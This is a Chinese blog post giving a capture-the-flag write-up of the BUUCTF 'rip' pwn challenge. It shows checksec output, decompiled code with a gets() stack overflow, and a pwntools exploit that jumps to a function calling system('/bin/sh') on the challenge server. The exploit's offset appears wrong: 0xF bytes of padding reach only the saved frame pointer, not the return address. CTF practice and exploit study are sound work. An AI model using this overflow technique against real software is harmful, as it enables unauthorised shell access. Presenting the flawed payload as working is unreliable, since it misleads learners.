加载头像

rip

0x01

Ubuntu 18

checksec

1
2
3
4
5
6
7
8
$ checksec pwn1 
[*] '/home/zelas/Desktop/pwn/rip/pwn1'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found 
    NX:       NX disabled
    PIE:      No PIE (0x400000)
    RWX:      Has RWX segments

IDA

1
2
3
4
5
6
7
8
9
10
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s[15]; // [rsp+1h] [rbp-Fh] BYREF

  puts("please input");
  gets((__int64)s, (__int64)argv); //gets函数存在栈溢出漏洞
  puts(s);
  puts("ok,bye!!!");
  return 0;
}

存在可疑函数fun

1
2
3
4
5
int fun()
{
  return system("/bin/sh");
}
//0x401186

0x02

解题思路

1.利用gets处的溢出覆盖返回地址为fun

s 0XF
ebp 0x401186
ret

0x03

exp

1
2
3
4
5
6
7
8
9
10
11
from pwn import *

# io = process(['./pwn1'])
io = remote('node4.buuoj.cn',26530)

system_addr = 0x401186
padding = 0xF 
payload = b'a' * padding + p64(system_addr)

io.sendline(payload)
io.interactive()
评论
匿名评论隐私政策
✅ 你无需删除空行,直接评论以获取最佳展示效果
avatar
这有关于运维、开发、后端相关的问题和看法。
相信你可以在这里找到对你有用的知识教程

Zelas2Xerath

技术苑
公告
2024/10/1-跟进上游更新
.NET1AMD1AWX1ChinaSkills2DIY1DirectX1GPU1IDA1KVM1Linux1Markdown1Office1Openwrt8Potplayer1Pwn1Python1RHCE1RHCSA1Redhat2Runtimes4Ryzen1Windows12ansible1cpu3eNSP1hexo2idm1iperf1pip1pwn1python1云计算2显示器1样题2职业技能大赛2虚拟化1装机3超频2配置单2金砖2
归档
网站资讯
文章总数 :
54
建站天数 :
全站字数 :
85.2k
总访客数 :
总访问量 :
最后更新 :
引用到评论
随便逛逛博客分类文章标签
复制地址关闭热评深色模式轉為繁體